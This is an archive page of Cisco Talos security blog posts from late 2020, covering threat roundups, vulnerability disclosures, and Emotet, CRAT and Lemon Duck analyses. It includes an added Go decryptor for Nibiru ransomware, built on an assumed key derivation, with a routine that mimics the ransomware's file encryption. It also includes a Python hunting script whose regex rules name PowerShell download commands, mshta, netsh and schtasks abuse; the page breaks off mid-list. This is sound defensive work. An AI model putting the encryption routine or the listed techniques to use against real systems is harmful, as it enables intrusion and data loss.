Friday, November 20, 2020

Threat Roundup for November 13 to November 20


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 13 and Nov. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, November 19, 2020

Threat Source newsletter (Nov. 19, 2020)

Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers. 

In case you hadn’t already realized, Snort somehow became a meme this week, so that was fun. 

As 2020 (finally...or already...I can’t decide which) comes to an end, we’re going to start looking back at the year that was in malware. And although Emotet has been around since long before this year, 2020 was particularly peculiar for the botnet because it went virtually dormant over the summer before coming back over the past few months. After we obtained ownership of several C2 domains that are part of Emotet, we looked at this threat’s trends and recent changes. 

We also released a new decryptor tool for the Nibiru ransomware. Any victims can use this to safely recover any files locked up as part of an infection. 

Wednesday, November 18, 2020

Back from vacation: Analyzing Emotet’s activity in 2020



By Nick Biasini, Edmund Brumaghin, and Jaeson Schultz.

Emotet is one of the most heavily distributed malware families today. Cisco Talos observes large quantities of Emotet emails being sent to individuals and organizations around the world on an almost daily basis. These emails are typically sent automatically by previously infected systems attempting to infect new systems with Emotet to continue growing the size of the botnets associated with this threat. Emotet is often the initial malware delivered as part of a multi-stage infection process and is not targeted in nature. Emotet has impacted systems in virtually every country on the planet over the past several years and often leads to high-impact security incidents, as the network access it provides to adversaries enables further attacks, such as big-game hunting and double-extortion ransomware attacks.

Cisco Talos obtained ownership of several domains that Emotet uses to send SMTP communications. We leveraged these domains to sinkhole email communications originating from the Emotet botnets for the purposes of observing the characteristics of these email campaigns over time and to gain additional insight into the scope and profile of Emotet infections and the organizations being impacted by this threat. Emotet has been observed taking extended breaks over the past few years, and 2020 was no exception. Let's take a look at what Emotet has been up to in 2020 and the effect it's had on the internet as a whole.

Tuesday, November 17, 2020

Nibiru ransomware variant decryptor



Nikhil Hegde developed this tool.

Weak encryption

The Nibiru ransomware is a .NET-based malware family. It traverses directories on the local disks, encrypts files with Rijndael-256 and gives them a .Nibiru extension. Rijndael-256 itself is a secure encryption algorithm; the weakness is in key management. Nibiru computes the 32-byte key and 16-byte IV from the hard-coded string "Nibiru", so the key material is identical for every victim and can be recomputed offline without any contact with the attacker. The decryptor program leverages this weakness to decrypt files encrypted by this variant.
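To make the weakness concrete, here is an added example (written for this page, not the Talos decryptor or Nibiru's own code) of what a decryptor for a hard-coded-key ransomware reduces to. Two things are assumed because the page does not give them: the exact routine that turns the string "Nibiru" into key and IV (SHA-256 is used as a stand-in), and the cipher itself, where AES-256-CBC (Rijndael with a 128-bit block, which is what Go's standard library offers) stands in for Rijndael-256. The in-memory "disk" and the sample file contents are constructed for the example; a real tool would walk the filesystem and write each recovered file back in place. The encrypt side is included only so the decryptor has something to work on.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"errors"
	"fmt"
	"strings"
)

const HardcodedSecret = "Nibiru" // constant the key material is computed from
const EncryptedExt = ".Nibiru"   // appended to every encrypted file

// DeriveKeyIV turns the constant into a 32-byte key and a 16-byte IV.
// ASSUMPTION: the sample's real derivation routine is not on the page; SHA-256
// of the secret (and of a domain-separated copy for the IV) is a stand-in. The
// point is that nothing per-victim goes in, so a decryptor can recompute both.
func DeriveKeyIV(secret string) (key, iv []byte) {
	k := sha256.Sum256([]byte(secret))
	i := sha256.Sum256([]byte(secret + "|iv"))
	return k[:], i[:16]
}

func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > size || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// EncryptFile reproduces the ransomware side so the decryptor has input. AES-256-CBC
// (Rijndael, 128-bit block) stands in for Rijndael-256, which Go's stdlib lacks.
func EncryptFile(plain []byte) []byte {
	key, iv := DeriveKeyIV(HardcodedSecret)
	block, _ := aes.NewCipher(key) // key is always 32 bytes, so this cannot fail
	padded := pkcs7Pad(plain, block.BlockSize())
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return out
}

// DecryptFile is the whole decryptor: recompute key and IV from the constant,
// undo CBC, strip padding. No key from the attacker is needed.
func DecryptFile(ct []byte) ([]byte, error) {
	key, iv := DeriveKeyIV(HardcodedSecret)
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%block.BlockSize() != 0 {
		return nil, errors.New("ciphertext not block aligned")
	}
	out := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, ct)
	return pkcs7Unpad(out, block.BlockSize())
}

// RecoverName strips the .Nibiru marker; ok is false if it was never there.
func RecoverName(name string) (orig string, ok bool) {
	if !strings.HasSuffix(name, EncryptedExt) {
		return name, false
	}
	return strings.TrimSuffix(name, EncryptedExt), true
}

// RecoverAll walks an in-memory "disk" (path -> contents), decrypts every .Nibiru
// file and returns the plaintexts under their original names.
func RecoverAll(disk map[string][]byte) (map[string][]byte, error) {
	recovered := make(map[string][]byte)
	for name, data := range disk {
		orig, ok := RecoverName(name)
		if !ok {
			continue // file the ransomware never touched
		}
		plain, err := DecryptFile(data)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", name, err)
		}
		recovered[orig] = plain
	}
	return recovered, nil
}

func main() {
	// Constructed sample file, not an artifact from a real infection.
	disk := map[string][]byte{"report.docx.Nibiru": EncryptFile([]byte("quarterly numbers"))}
	files, err := RecoverAll(disk)
	fmt.Printf("%q %v\n", files, err)
}
```

The design point is in DeriveKeyIV: because its only input is a constant, the defender's decryptor and the attacker's encryptor compute the same key, and the cipher's strength never comes into play. Files that fail the block-alignment or padding checks are reported rather than silently overwritten, which is the behaviour you want from a recovery tool run against partially damaged data.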

Ransomware

Nibiru ransomware is a poorly executed ransomware variant. It traverses directories and encrypts files with Rijndael-256. The files are given an extension, .Nibiru, after encryption. The ransomware targets numerous common file extensions but skips critical directories like Program Files, Windows and System Volume Information.

Extensions targeted by Nibiru:

.doc, .docx, .xls, .xlsx, .ppt, .pptx, .jpg, .jpeg, .png, .psd, .txt, .zip, .rar, .html, .php, .asp, .aspx, .mp4, .avi, .3gp, .wmv, .MOV, .mp3, .wav, .flac, .wma, .mov, .raw, .apk, .encrypt, .crypted, .ahok, .cs, .vb.

Compiling

We've tested the Nibiru Ransomware Variant Decryptor using Visual Studio Community 2019, version 16.7.6, on Windows 10 with .NET Framework version 4.8.03752. No additional packages are necessary to compile.

You can download the decryptor over at the Talos GitHub.

Example hash:

e0a681902f4f331582670e535a7d1eb3d6eff18d3fbed3ffd2433f898219576f

Friday, November 13, 2020

Threat Roundup for November 6 to November 13


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 6 and Nov. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, November 12, 2020

Vulnerability Spotlight: Multiple vulnerabilities in Pixar OpenUSD affect some versions of macOS



Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Aleksandar Nikolic and Jon Munshaw.

Pixar OpenUSD contains multiple vulnerabilities that attackers could exploit to carry out a variety of malicious actions. 

OpenUSD stands for “Open Universal Scene Description.” Pixar uses this software for several types of animation tasks, including swapping arbitrary 3-D scenes that are composed of many different elements. Aimed at professional animation studios, the software is designed for scalability and speed as a pipeline connecting various aspects of the digital animation process. In most use cases it is expected to process trusted input, which is at odds with security considerations. 

The USD file format itself is used as an interchange file format inside Apple’s ARKit (Augmented Reality), SceneKit (3-D scene composition) and ModelIO (3-D modeling and animation) frameworks. Apple’s decision to use USD as the basis of its augmented reality platform makes it a potentially interesting attack surface. With the expansion of AR applications on both macOS and iOS platforms, this becomes more important for researchers to look at. 

Threat Source newsletter (Nov. 12, 2020)


Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers. 

We’re back after a few-week hiatus! And to celebrate, we just dropped some new research on the CRAT trojan that’s bringing some ransomware friends along with it. This blog post has all the details of this threat along with what you can do to stay protected. 

We also had Microsoft Patch Tuesday this week. The company disclosed just over 110 vulnerabilities this month that all users should patch now. Our blog post has a rundown of the most prominent bugs and you can check out the Snort rule update for all defenses against the exploitation of these vulnerabilities.  

And if you missed it last week, we recently put out an advisory alerting health care organizations of a recent spike in ransomware. If you have a customer that has been impacted by an attack, ransomware or otherwise, the first course of action is to engage Cisco Talos Incident Response Services (CTIR).  Please head to this page and follow the instructions for contacting IR at the top right of the page. 

CRAT wants to plunder your endpoints



By Asheer Malhotra.

  • Cisco Talos has observed a new version of a remote access trojan (RAT) family known as CRAT.
  • Apart from the prebuilt RAT capabilities, the malware can download and deploy additional malicious plugins on the infected endpoint.
  • One of the plugins is a ransomware known as "Hansom."
  • CRAT has been attributed to the Lazarus APT Group in the past.
  • The RAT consists of multiple obfuscation techniques to hide strings, API names, command and control (C2) URLs and instrumental functions, along with static detection evasion.
  • The attack also employs a multitude of anti-infection checks to evade sandbox-based detection systems.

What's new?

Cisco Talos has recently discovered a new version of the CRAT malware family. This version consists of multiple RAT capabilities, additional plugins and a variety of detection-evasion techniques. In the past, CRAT has been attributed to the Lazarus Group, the malicious threat actors behind multiple cyber campaigns, including attacks against the entertainment sector.

Indicators and tactics, techniques and procedures (TTPs) discovered by this investigation resemble those of the Lazarus Group.

How did it work?

The attack consists of a highly modular malware that can function as a standalone RAT and download and activate additional malicious plugins from its C2 servers. Cisco Talos has discovered multiple plugins so far, consisting of ransomware, screen-capture, clipboard monitoring and keylogger components.

So what?

This attack demonstrates how the adversary operates an attack that:
  • Uses obfuscation and extensive evasion techniques to hide its malicious indicators.
  • Has evolved across versions to improve the effectiveness of its attacks.
  • Employs a highly modular plugin framework to selectively infect targeted endpoints.
  • Most importantly, deploys the RAT to ransack the endpoint, then drops ransomware to either extort money or burn the infrastructure of targeted entities.

Tuesday, November 10, 2020

Microsoft Patch Tuesday for Nov. 2020 — Snort rules and prominent vulnerabilities

 

By Jon Munshaw, with contributions from Joe Marshall.

Microsoft released its monthly security update Tuesday, disclosing just over 110 vulnerabilities across its products. This is a slight jump from last month, when Microsoft disclosed one of its lowest vulnerability totals in months.  

Eighteen of the vulnerabilities are considered “critical," the vast remainder are ranked as “important,” and two are rated “low.” Users of all Microsoft and Windows products are urged to update their software as soon as possible to avoid possible exploitation of these bugs.  

The security updates cover several different products and services, including the HEVC video file extension, the Azure Sphere platform and Microsoft Exchange servers.

Friday, November 6, 2020

Threat Roundup for October 30 to November 6


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 30 and Nov. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, November 5, 2020

Vulnerability Spotlight: Multiple JavaScript vulnerabilities in Adobe Acrobat Reader



Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Joe Marshall.



Cisco Talos recently discovered a heap buffer overflow and a use-after-free vulnerability in Adobe Acrobat Reader. Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually the default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger these vulnerabilities.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC JavaScript submitForm heap buffer overflow (TALOS-2020-1157/CVE-2020-24435)

Specific JavaScript code embedded in a PDF file can lead to out-of-bounds memory access when opening a PDF document in Adobe Acrobat Reader DC 2020.006.20034. With careful memory manipulation, this can lead to sensitive information being disclosed as well as memory corruption, which can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

While testing a newer version of Adobe Acrobat Reader, we found that a previously patched vulnerability could be reproduced again. 

Namely, the heap buffer overflow TALOS-2020-1031 was disclosed to Adobe and patched in an update on April 5. The details of the vulnerability remain the same.

Read the complete vulnerability advisory here for additional information. 

Vulnerability details

Adobe Acrobat Reader DC form field format use after free (TALOS-2020-1156 / CVE-2020-24437)

Specific JavaScript code embedded in a PDF file can lead to heap corruption when opening a PDF document in Adobe Acrobat Reader DC 2020.006.20043. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

Read the complete vulnerability advisory here for additional information. 

Versions tested

Talos tested and confirmed that version 2020.012.20043 of Adobe Acrobat Reader DC is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 53563-53564, 55842-55843

Friday, October 30, 2020

Cisco Talos Advisory on Adversaries Targeting the Healthcare and Public Health Sector

Background

Cisco Talos has become aware that an adversary is leveraging the Trickbot banking trojan and Ryuk ransomware to target U.S. hospitals and healthcare providers at an increasing rate. Security journalists reported on October 28, 2020 that the adversary was preparing to encrypt systems at “potentially hundreds” of medical centers and hospitals, based on a tip from a researcher who had been monitoring communications for the threat actor. On October 28 and 29, these claims were supported by reports of six U.S. hospitals being compromised with Ryuk in the span of 24 hours.

CISA, the FBI, and HHS also confirmed this activity targeting the Healthcare and Public Health Sector, releasing a joint advisory on October 28, 2020. The advisory stated that the Ryuk actors were using Trickbot to target the industry and that the activity posed an “increased and imminent” threat. They also published technical indicators for both Trickbot and Ryuk. 

Talos has years of experience dealing with Trickbot, Ryuk, and other tools used by the adversary. We are currently supporting customers who are affected and working hand-in-hand with federal law enforcement to support their investigations.  We are also supporting other law enforcement and federal agencies as well.

If you have a customer that has been impacted by an attack, ransomware or otherwise, the first course of action is to engage Cisco Talos Incident Response Services (CTIR).  Please head to https://talosintelligence.com/IR and follow the instructions for contacting IR at the top right of the page.

Threat Roundup for October 23 to October 30


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 23 and Oct. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, October 29, 2020

DoNot’s Firestarter abuses Google Firebase Cloud Messaging to spread



By Warren Mercer, Paul Rascagneres and Vitor Ventura.

  • The newly discovered Firestarter malware uses Google Firebase Cloud Messaging to notify its authors of the final payload location.
  • Even if the command and control (C2) is taken down, the DoNot team can still redirect the malware to another C2 using Google infrastructure.
  • The way the final payload is delivered indicates a highly personalized targeting policy.

What's new? The DoNot APT group is making strides to experiment with new methods of delivery for their payloads. They are using a legitimate service within Google's infrastructure, which makes detection across a user's network harder.

How did it work? Users are lured into installing a malicious app on their mobile device. This malicious app contains additional malicious code that attempts to download a payload based on information obtained from the compromised device. This ensures only very specific devices are delivered the malicious payload.

So what? Innovation across APT groups is not unheard of, and it shouldn't come as a huge surprise that a group continues to modify its operations to stay as stealthy as possible. This should be another warning sign to people in geopolitically "hot" regions that it is entirely possible to become a victim of a highly motivated group.

Beers with Talos ep. #95: Election 2020 – Advice for voters and election officials




Beers with Talos (BWT) Podcast episode No. 95 is now available. Download this episode and subscribe to Beers with Talos. If iTunes and Google Play aren't your thing, click here.

By Mitch Neff.

Recorded Oct. 9, 2020


We are running a short bench today after Nigel’s retirement last ep and Joel being on vacation. We start off talking about how specific use cases don’t equate to the death of entire defensive technologies, despite the frequent assertions otherwise that you may find on Twitter. The key to defense in depth is that no silver bullet stops everything - nothing is surprising here.

The big focus of this episode, leading into the 2020 election, is, of course, election security. We recap some important points from our research and go over materials we have put together for election officials and voters alike. Please take a minute to go through the links in the extended show notes for a full list of Talos election security and disinformation resources.

Vulnerability Spotlight: Multiple vulnerabilities in Synology SRM (Synology Router Manager)


Claudio Bozzato of Cisco Talos discovered these vulnerabilities. Blog by Claudio Bozzato and Jon Munshaw.

Cisco Talos recently discovered multiple remote vulnerabilities in software that helps power Synology routers. The bugs exist in Synology Router Manager (SRM) — a Linux-based operating system for Synology routers — and QuickConnect, a feature inside SRM that allows users to remotely connect to their routers. An adversary could use these vulnerabilities to carry out a range of malicious actions, including executing remote code on the device, the exposure of sensitive information regarding the victim’s network and communication with other devices connected to the same network.

Friday, October 23, 2020

Threat Roundup for October 16 to October 23


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 16 and Oct. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Wednesday, October 21, 2020

Vulnerability Spotlight: A deep dive into WAGO’s cloud connectivity and the vulnerabilities that arise


Report and research by Kelly Leuschner.

WAGO makes several programmable automation controllers that are used in many industries including automotive, rail, power engineering, manufacturing and building management. Cisco Talos discovered 41 vulnerabilities in their PFC200 and PFC100 controllers. In accordance with our coordinated disclosure policy, Cisco Talos worked with WAGO to ensure that these issues were resolved and that a firmware update is available for affected customers.

Since a patch has been available to affected customers for some time, we wanted to take this opportunity to discuss several attack chains that exploit WAGO’s cloud connectivity client known as “dataagent” to gain root access to the device. You can also catch a technical presentation of these vulnerabilities at the virtual CS3Sthlm conference on Oct. 22, 2020. 

WAGO provides a cloud connectivity feature for users to access remote telemetry from their devices and even issue firmware updates remotely. Cloud connectivity provides an interesting attack vector, where the attack originates from a trusted cloud provider but the cloud instance itself is attacker-controlled. The scenario we will dive into today is one where the attacker has access to legitimate cloud infrastructure and can abuse WAGO’s custom protocol to gain root privileges on the device.

We’ll first dive into the technical details of each of the vulnerabilities themselves. Then we’ll discuss how these vulnerabilities can be combined in two distinct attack chains that result in the ability to gain root privileges on the device.

What to expect when you’re electing: A recap

We’re roughly two weeks out from Election Day in America, although millions of early and mail-in votes have already been cast. In the coming days, there’s sure to be a flurry of news stories about disinformation, allegations of voter fraud, the back-and-forth between parties and talks of when the results can be trusted, and someone can call the presidential race. 

While Cisco Talos can’t provide you all the answers, we can at least give you an idea of what American election officials at the state, local and national levels are currently facing. We at Talos and elsewhere across Cisco Secure have released several research papers, blog posts, graphics, videos and more discussing election security and disinformation this year. 

Here’s a complete list of everything we’ve covered so far. Please share this information with friends, family members and colleagues as we all try to keep up with the news cycle between now and Nov. 3 (and likely far beyond that). 

Tuesday, October 20, 2020

Vulnerability Spotlight: Code execution vulnerability in Google Chrome WebGL

 

Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

The Google Chrome web browser contains a vulnerability that could be exploited by an adversary to gain the ability to execute code on the victim machine. Chrome is one of the most popular web browsers currently available to users. Cisco Talos researchers recently discovered a bug in WebGL, which is a Chrome API responsible for displaying 3-D graphics.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Google to ensure that these issues are resolved and that an update is available for affected customers.

Dynamic Data Resolver - Version 1.0.1 beta

By Holger Unterbrink.

Cisco Talos is releasing a new beta version of Dynamic Data Resolver (DDR) today. This release comes with a new architecture for samples using multi-threading. The process and thread tracing has been completely reimplemented.

We also fixed a few bugs and memory leaks. Another new feature is that the DDR backend now comes in two flavors: a release version and a debugging version. The latter will improve code quality and bug hunting, as it helps to detect memory leaks and minor issues that are silently handled by the underlying DynamoRIO framework in the release version. We also improved the installer, and the IDA plugin is now installed to the user plugin directory instead of into the IDA installation directory under Program Files. The IDA plugin and all its dependencies are also now automatically installed by a script.  

You can download DDR, version 1.0.1 beta, here.

Fantastic news! DDR has won the HexRays IDA plugin contest 2020

We would like to thank HexRays for recognizing this plugin and awarding it with the first prize in their IDA plugin contest. We hope HexRays keeps up the fantastic work they are doing with IDA. It makes our reverse-engineering lives a bit easier every day.

Friday, October 16, 2020

Threat Roundup for October 9 to October 16


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 9 and Oct. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Beers with Talos ep. #94: Nigel is marching on, victorious and glorious



Beers with Talos (BWT) Podcast episode No. 94 is now available. Download this episode and subscribe to Beers with Talos. If iTunes and Google Play aren't your thing, click here.

By Mitch Neff.

Recorded Sept. 25, 2020


Today is Nigel’s last episode as a regular host of BWT. Join us in wishing him a happy transition to his next chapter. As we all know, Nigel won’t ever actually retire. Today’s show is us chatting with Nigel — about his career and his take on the industry as he entered, and now as he moves on to whatever comes next. Every aspect of Talos is better off because Nigel was here, as well as so many of the people he came across along the way.

We will all miss your daily presence, but we are excited to see what you come up with next. Cheers.

Thursday, October 15, 2020

Threat Source newsletter (Oct. 15, 2020)



Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers. 

In our latest entry into our election security series, we’re turning our attention to the professionals who are responsible for securing our elections. After months of research, we’ve compiled a series of recommendations for local, state and national officials to combat disinformation and secure Americans’ faith in the election system. 

Patch Tuesday was also this week, which as usual, brought with it a big Snort rule release and our breakdown of the important Microsoft vulnerabilities you need to know about. 

What to expect when you're electing: How election officials can counter disinformation

 

By Matthew Olney and the communications and public relations professionals at Cisco.

Editor's Note: For more on this topic, sign up for a Cisco Duo webinar on election security on Oct. 15 at 1 p.m. ET here.

In our work with our partners in the election security space, the most difficult question we’ve been asked is “What do we do about disinformation campaigns?” This isn’t something Talos usually specializes in, as it’s not a true technical security problem. However, one of the great benefits of working at Cisco is the incredible breadth of capability of our coworkers and partners. So, correctly framing the question as a communications issue, we worked with Cisco communications professionals and our outside communications partners to put together an outline of a communications plan for elections officials facing disinformation campaigns. 

To help the reader understand why we’re making the recommendations we are, we will summarize here the findings of our previous reports on elections security and disinformation. In short, we have found that while one of the goals of foreign adversaries may be to favor a particular candidate, the primary objective of both disinformation campaigns and election interference up to this point is to aggravate existing social, cultural and political divisions and sow doubt about the fairness and integrity of Western democracies. The driving goal here is to weaken the United States and other global democratic powers to allow foreign adversaries to more easily achieve their geopolitical objectives. Here's a similar set of recommendations specifically for voters.

Vulnerability Spotlight: Code execution, information disclosure vulnerabilities in F2FS toolset



Vulnerabilities discovered by a Cisco Talos researcher. Blog by Jon Munshaw.

Cisco Talos recently discovered multiple code execution and information disclosure vulnerabilities in various functions of the F2FS toolset. The F2FS toolset is a set of utilities, commonly found on embedded devices, that creates, checks and repairs Flash-Friendly File System (F2FS) images. An attacker could provide a malicious file to the target to trigger these vulnerabilities, causing a variety of negative conditions for the target.

In accordance with Cisco’s coordinated disclosure policy, we are disclosing these vulnerabilities without an update from F2FS after the organization failed to meet the 90-day deadline.

Tuesday, October 13, 2020

Vulnerability Spotlight: Denial of service in AMD ATIKMDAG.SYS driver

  

Piotr Bania of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered a denial-of-service vulnerability in the ATIKMDAG.SYS driver for some AMD graphics cards. An attacker could send the victim a specially crafted D3DKMTCreateAllocation API request to cause an out-of-bounds read, leading to a denial-of-service condition. This vulnerability could be triggered from a guest account.

In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to disclose this vulnerability and ensure an update is available.

Microsoft Patch Tuesday for Oct. 2020 — Snort rules and prominent vulnerabilities



By Jon Munshaw, with contributions from Alex McDonnell and Nick Biasini.

Microsoft released its monthly security update Tuesday, disclosing just under 100 vulnerabilities across its array of products.  

Fourteen of the vulnerabilities are considered “critical" while the vast remainder are ranked as “important.” Users of all Microsoft and Windows products are urged to update their software as soon as possible to avoid possible exploitation of all these bugs.

Vulnerability Spotlight: Information leak vulnerability in Google Chrome WebGL



Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

The Google Chrome web browser contains a vulnerability that could be exploited by an adversary to carry out a range of malicious actions. Chrome is one of the most popular web browsers currently available to users. Cisco Talos researchers recently discovered a bug in Chrome's implementation of WebGL, the JavaScript API that browsers use to render 3-D graphics.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Google to ensure that this issue is resolved and that an update is available for affected customers.

Lemon Duck brings cryptocurrency miners back into the spotlight



By Vanja Svajcer, with contributions from Caitlin Huey.

  • We are used to ransomware attacks and big-game hunting making headlines, but there are still methods adversaries use to monetize their efforts in less intrusive ways.
  • Cisco Talos recently recorded increased activity of the Lemon Duck cryptocurrency-mining botnet, which uses several techniques that defenders are likely to spot but that are not immediately obvious to end users.
  • These threats demonstrate several techniques of the MITRE ATT&CK framework, most notably T1203 (Exploitation for Client Execution), T1089 (Disabling Security Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1035 (Service Execution), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1053 (Scheduled Task), T1562.004 (Impair Defenses: Disable or Modify System Firewall) and T1218.005 (Signed Binary Proxy Execution: Mshta).


Attackers are constantly reinventing ways of monetizing their tools. Cisco Talos recently discovered a complex campaign employing a multi-modular botnet with multiple ways to spread. This threat, known as "Lemon Duck," has a cryptocurrency mining payload that steals computer resources to mine the Monero virtual currency. The actor employs various methods to spread across the network: infected RTF files sent by email, psexec, WMI and SMB exploits, including the infamous EternalBlue and SMBGhost vulnerabilities that affect Windows 10 machines. Some variants also support RDP brute-forcing, although this functionality was omitted in the recent attacks we observed. The adversary also uses tools such as Mimikatz that help the botnet increase the number of systems participating in its mining pool.

What's new?


Although this threat has been active since at least the end of December 2018, we have noticed an increase in its activity at the end of August 2020.

How did it work?


The infection starts with a PowerShell loading script, which is copied from other infected systems with SMB, email or external USB drives. The actor also employs several exploits for vulnerabilities such as SMBGhost and Eternal Blue. The code exploiting the Bluekeep vulnerability is also present but it is disabled in the version we analysed.

The botnet has executable modules that get downloaded and driven by the main module, which communicates with the command and control (C2) server over HTTP.

The email-spreading module uses COVID-19-related subject lines and text, with an infected attachment sent using Outlook automation to every contact in the affected user's address book.

So what?


Defenders need to be constantly vigilant and monitor the behavior of systems within their network to spot new resource-stealing threats such as cryptominers. Cryptocurrency-mining botnets can be costly in terms of the stolen computing cycles and power consumption costs. While organizations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure.
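The behaviours described above (a hidden PowerShell loader, scheduled tasks, mshta, firewall rules added with netsh, admin-share copies and Outlook automation for the mail spreader) each show up in process-creation telemetry, and none of them is damning on its own. The hunt below is an added example, not Talos or Lemon Duck code: it scores constructed, simplified process-creation records per host against rules that follow the ATT&CK techniques listed in the write-up, and only raises a host once several distinct behaviours stack up on it. The record format, host names, task name, port and URL in the sample are all made up.

```python
"""Hunt for a Lemon Duck-style spreading chain in process-creation logs.

Added example for this write-up, not Talos or Lemon Duck code. The input is a
constructed, simplified record (timestamp|host|parent image|image|command line);
every sample line is made up and the names, URL and port in them are placeholders.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional

# (label, description, pattern matched against "image command_line"). Labels follow
# the ATT&CK IDs used in the write-up; two behaviours it describes without an ID
# (Outlook automation, Mimikatz) get plain labels.
RULES = [
    ("T1086", "PowerShell hidden window / encoded command / in-memory download",
     re.compile(r"powershell.*(?:-enc\w*\s+[A-Za-z0-9+/=]{20,}|-w(?:indowstyle)?\s+hidden|DownloadString)", re.I)),
    ("T1218.005", "mshta launched with a URL or inline script",
     re.compile(r"mshta(?:\.exe)?\s+(?:https?://|javascript:|vbscript:)", re.I)),
    ("T1562.004", "host firewall rule added or changed with netsh",
     re.compile(r"netsh\s+(?:advfirewall\s+)?firewall\s+(?:set|add)", re.I)),
    ("T1053", "scheduled task created",
     re.compile(r"schtasks(?:\.exe)?\s+/create", re.I)),
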